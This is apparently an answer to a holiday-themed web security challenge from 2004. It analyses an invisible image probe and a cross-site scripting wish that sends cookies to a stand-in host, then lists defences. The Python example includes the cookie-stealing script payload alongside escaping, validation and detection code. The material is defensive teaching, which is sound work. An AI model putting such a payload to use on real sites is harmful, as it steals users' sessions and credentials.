
By Mark Davis

1. What is the purpose of the first malicious wish text, and how does it work?

I would expect it to be an attempt to ascertain whether or not the web application accepts and returns HTML data. Using an image link to do so may go unchecked by log watch software and also provides evidence that external websites can be accessed without problem. The image properties are of no consequence (0x0).

It works by asking whatever application is loading the page to retrieve the remotely hosted image. The bumblesnowmonster owner can check his web server logs to see if the image was loaded.

2. What is the purpose of the second malicious wish text, and how does it work?

It would appear to be a classic attempt to use cross-site scripting (XSS) in an attack. Obviously I can't know what is contained in the cgi application, but since it is parsing the user's cookie for the "santa application" domain (whatever it is), and the cgi application is called "grab", I assume it is an attempt to grab the user's cookie data, which may contain sensitive information like username and password.

How does it work? Well, obviously I can't say how the grab.cgi application works exactly, but I assume it is something like this:
$usercookiedata = $ENV{QUERY_STRING};   # the victim's cookie arrives as the query string of the request
From here, the cgi app can write the cookie contents to disk or send an email etc etc. The retrieved cookie values are for the USER of the santa site, so if it was an authorised administrative user, then those credentials will allow the malicious bumblesnowmonster cgi app owner to possibly gain admin privileges and change any values that other admins can in the santa application (eg naughty/nice). Definitely an act worthy of getting coal in their stocking!

3. How could Hermey and Rudolph thwart the first and second types of attacks by altering the Web application? Alternatively, how could they stop these attacks by changing the configuration of the analyst elves' browsers?

A combination of all these would certainly stop the above attack:

a. Configure the web server to deny access to the administrative interface from external sources (eg apache deny from directive), and only allow access from the internal network or even specific IPs.

b. VALIDATE all form data and strip all the HTML tags from the data, so that HTML tags are rendered ineffective, e.g. "<" turned into &lt;. This will stop the image being grabbed, and will just have the img text printed.

c. You could also use regular expressions in the application code, and limit entered data to be numeric or alphabetic, excluding anything not "0 - 9, A - z". This will also prevent any HTML tags from getting in; it is more effective but more time consuming (unless you already have a nice script for doing it :) ) than the above solution.

d. You could also install parsing filters at the web server application level that filter out "malicious" (or whatever you want) data, but really, these can cause problems, so I would say they are not entirely necessary if the above steps have been implemented.
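As an added illustration of the escaping and validation measures just described (this is example code written for this page, not part of the original answer or of the challenge's santa application), the following Python shows three things side by side: HTML-escaping the wish text before it is echoed to an analyst's browser, an allowlist regex check that rejects anything outside plain letters, digits and light punctuation, and a simple flag for submissions that look like the two malicious wishes discussed in questions 1 and 2. The sample wishes and the bumblesnowmonster.example hostname are constructed for the example.

```python
import html
import re

# Constructed sample wish-list submissions (not taken from the challenge page).
# The first two mimic the two kinds of malicious wish text discussed above;
# the third is an ordinary wish.
SAMPLE_WISHES = [
    '<img src="http://bumblesnowmonster.example/probe.gif" width="0" height="0">',
    '<script>document.location="http://bumblesnowmonster.example/cgi-bin/grab.cgi?"'
    '+document.cookie</script>',
    "A red bicycle and a puppy",
]

# Allowlist for measure (c): letters, digits, spaces and a little punctuation.
ALLOWED = re.compile(r"^[A-Za-z0-9 ,.!'-]*$")

# Markers a defender might log or alert on in submitted wish text.
SUSPICIOUS = re.compile(
    r"<\s*(img|script|iframe)\b|document\.cookie|javascript:", re.IGNORECASE
)


def escape_wish(text: str) -> str:
    """Measure (b): make tags inert by HTML-escaping before rendering.

    '<' becomes '&lt;', quotes become entities, so the browser shows the
    img/script text instead of fetching the image or running the script.
    """
    return html.escape(text, quote=True)


def validate_wish(text: str, max_len: int = 200) -> bool:
    """Measure (c): accept only wishes made entirely of allowlisted characters."""
    return len(text) <= max_len and ALLOWED.fullmatch(text) is not None


def flag_suspicious(text: str) -> bool:
    """Detection: does the submission contain tag or cookie-theft markers?"""
    return SUSPICIOUS.search(text) is not None


def process_wish(text: str) -> dict:
    """Run all three checks and return what the application should do."""
    return {
        "accepted": validate_wish(text),
        "flagged": flag_suspicious(text),
        "safe_html": escape_wish(text),
    }


if __name__ == "__main__":
    for wish in SAMPLE_WISHES:
        print(process_wish(wish))
```

Escaping alone already defeats both sample wishes because the browser never sees a real `<img>` or `<script>` tag; the allowlist check rejects them before storage, and the suspicious-marker flag gives the analyst elves a log entry to investigate even when the content is rendered harmlessly.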

Client Side:
a. If possible, turn off javascript (and other scripting like vbscript), but still allow cookies.

b. Use the latest version of their browser.

c. Configure the analyst elves' browsers so that they don't load images haha :)

d. Delete cookies each time the browser is closed, for good measure.

a. Prevent the elves from accessing the internet in the first place, so they can only browse (and hence their browsers can only access) the internal network. This can be accomplished by any number of means, but essentially means implementing a firewall.

b. Mail server: have email scanned to remove HTML tags from the mail destined for processing by the analysts (e.g. MailScanner).

4. Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different methods for defeating such attacks by altering an e-mail reader's configuration?

a. Turn OFF all scripting support for the email client.

b. Do NOT display HTML emails! Make it plain TEXT only.

- Mark Davis


©Copyright 2004, Ed Skoudis